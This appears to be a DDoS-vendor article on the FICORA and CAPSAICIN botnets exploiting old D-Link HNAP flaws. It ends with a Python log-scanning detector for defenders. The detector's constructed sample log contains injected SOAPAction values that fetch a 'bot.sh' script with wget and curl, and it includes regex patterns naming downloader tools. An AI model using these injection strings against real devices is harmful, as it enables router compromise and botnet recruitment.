Cybersecurity researchers have reported a surge in malicious activity involving the exploitation of old D-Link router vulnerabilities by two different botnets, FICORA and CAPSAICIN. These botnets spread through documented D-Link vulnerabilities that allow remote attackers to execute malicious commands via the Home Network Administration Protocol (HNAP) interface.
The FICORA botnet attacks have targeted various countries globally, deploying a downloader shell script from a remote server, which then downloads the main payload for different Linux architectures. The botnet malware includes a brute-force attack function and features to conduct distributed denial-of-service (DDoS) attacks using UDP, TCP, and DNS protocols.
On the other hand, CAPSAICIN primarily targets East Asian territories such as Japan and Taiwan. It is served from a different IP address and follows a similar approach to fetch the botnet binary for various Linux architectures. CAPSAICIN opens a socket to its command-and-control server and sends back the victim host's OS information and the nickname assigned by the malware. It then waits for further commands to execute on the compromised device, covering a range of malicious operations.
Although these vulnerabilities were disclosed and patched nearly a decade ago, the attacks remain active worldwide. This underlines the importance of regular kernel updates and comprehensive monitoring for every enterprise that wants to keep its network secure.
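Since both botnets arrive through the HNAP interface, the monitoring the article calls for can start with the device-facing access logs. The following Python script is an added example, not code from the article or from FastNetMon: it parses a handful of constructed access-log lines and flags HNAP requests whose SOAPAction header carries shell metacharacters or download-tool names, which is what a command-injection attempt through a SOAP API looks like from the defender's side. It assumes that HNAP requests are served under the /HNAP1/ path and carry a SOAPAction header (how HNAP is addressed), and that a reverse proxy or IDS in front of the router logs that header as the last quoted field; the log lines, IP addresses (documentation ranges), timestamps and namespace `hnap.example` are all constructed.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample log, combined format plus the SOAPAction header as the
# final quoted field. Addresses come from the RFC 5737 documentation ranges.
SAMPLE_LOG = """\
198.51.100.7 - - [01/Jan/2025:10:01:02 +0000] "POST /HNAP1/ HTTP/1.1" 200 512 "-" "RouterAdminUI" "http://hnap.example/GetDeviceSettings"
203.0.113.9 - - [01/Jan/2025:10:01:05 +0000] "POST /HNAP1/ HTTP/1.1" 500 0 "-" "Wget/1.21" "http://hnap.example/GetDeviceSettings/;wget http://203.0.113.9/bot.sh"
192.0.2.4 - - [01/Jan/2025:10:01:09 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0" "-"
203.0.113.9 - - [01/Jan/2025:10:01:12 +0000] "POST /HNAP1/ HTTP/1.1" 500 0 "-" "curl/8.0" "http://hnap.example/GetDeviceSettings/$(curl http://203.0.113.9/bot.sh)"
"""

# Combined log format with one extra quoted field for the SOAPAction header.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)" "(?P<soap>[^"]*)"$'
)

# A legitimate SOAPAction value is a plain URI; none of these belong in it.
SHELL_META = re.compile(r'[;|`&]|\$\(')
# Names of tools a downloader stage would invoke on a Linux router.
DOWNLOADER = re.compile(r'\b(wget|curl|tftp|busybox)\b', re.IGNORECASE)


@dataclass
class Alert:
    src_ip: str
    timestamp: str
    reason: str
    soapaction: str


def parse_line(line: str) -> Optional[dict]:
    """Return the named fields of one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(rec: dict) -> Optional[str]:
    """Return a reason string if the record looks like an HNAP injection attempt."""
    # Only the HNAP endpoint is in scope; other paths are left to other rules.
    if not rec["path"].startswith("/HNAP1"):
        return None
    soap = rec["soap"]
    if SHELL_META.search(soap):
        return "shell metacharacter in SOAPAction header"
    if DOWNLOADER.search(soap):
        return "download-tool name in SOAPAction header"
    return None


def scan(log_text: str) -> List[Alert]:
    """Run the classifier over every parseable line and collect alerts."""
    alerts: List[Alert] = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue  # malformed or differently formatted line; skip it
        reason = classify(rec)
        if reason:
            alerts.append(Alert(rec["ip"], rec["ts"], reason, rec["soap"]))
    return alerts


def suspicious_sources(alerts: List[Alert]) -> Dict[str, int]:
    """Count alerts per source address, e.g. to feed a block list or a ticket."""
    counts: Dict[str, int] = {}
    for a in alerts:
        counts[a.src_ip] = counts.get(a.src_ip, 0) + 1
    return counts


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for a in found:
        print(f"{a.timestamp} {a.src_ip}: {a.reason}: {a.soapaction!r}")
    print("per-source counts:", suspicious_sources(found))
```

On the sample above the two requests from 203.0.113.9 are flagged and the benign HNAP call and the unrelated GET are not. The metacharacter rule fires first because it is the stronger signal; the tool-name rule is a fallback for payloads that avoid obvious separators. A real deployment would also want to alert on the device itself making outbound fetches right after such a request, which is the downloader stage the article describes.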
About FastNetMon
FastNetMon delivers versatile DDoS detection software for companies at any scale. With extensive experience in the telecom, mobile, and cloud computing industries, we take pride in preventing DDoS attacks and protecting our customers’ networks to the highest standard.